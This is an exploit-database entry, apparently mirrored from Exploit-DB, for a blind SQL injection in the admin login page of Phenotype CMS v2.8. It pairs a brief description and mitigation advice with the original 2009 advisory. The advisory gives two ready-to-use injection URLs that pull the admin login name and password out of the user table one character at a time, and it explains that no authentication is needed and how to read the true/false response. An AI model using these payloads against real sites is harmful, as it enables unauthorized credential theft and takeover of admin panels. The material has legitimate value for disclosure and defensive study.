Phenotype v2.8 Blind Sql Injection

vendor:

Phenotype

by:

Sina Yazdanmehr (R3d.W0rm)

7,5

CVSS

HIGH

Blind SQL Injection

CWE

Product Name: Phenotype

Affected Version From: 2.8

Affected Version To: 2.8

Patch Exists: NO

Related CWE: N/A

CPE: a:phenotype_cms:phenotype

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Phenotype v2.8 Blind Sql Injection

A Blind SQL Injection vulnerability exists in Phenotype v2.8 which allows an attacker to gain access to the admin username and password. This is done by sending a specially crafted HTTP request to the login.php page with the user parameter set to a malicious SQL query. The malicious query is designed to extract the admin username and password from the user table in the database. The attacker can then use the obtained credentials to gain access to the admin panel.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all user input is properly sanitized and validated before being used in any SQL queries. Additionally, the application should be configured to use parameterized queries instead of dynamic SQL queries.

Source

Exploit-DB raw data:

#####################################################################################
####                   Phenotype v2.8  Blind Sql Injection                       ####
#####################################################################################
#                                                                                   #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)                                                #
#Discovered by : Sina Yazdanmehr (R3d.W0rm)                                         #
#Our Site : http://ircrash.com                                                      #
#My Official WebSite : http://r3dw0rm.ir                                            #
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr)            #
#####################################################################################
#                                                                                   #
#Download : http://www.phenotype-cms.com                                            #
#                                                                                   #
#Dork : :(                                                                          #
#                                                                                   #
#####################################################################################
#                                      [Bug]                                        #
#                                                                                   #
#http://[site]/_phenotype/admin/login.php?user=-999') and ascii(substring((select user_login from user limit 1,1),1,1))=[ascii code try]/*
#http://[site]/_phenotype/admin/login.php?user=-999') and ascii(substring((select user_pass from user limit 1,1),1,1))=[ascii code try]/*
#                                                                                   #
#Note :                                                                             #
#1. This bug in admin folder, but u dont need to login,u can use bug with out login #
#2. If ascii is true u see login page else u see 500 Internal Server Error          #
#                                                                                   #
###################################### TNX GOD ######################################

# milw0rm.com [2009-07-10]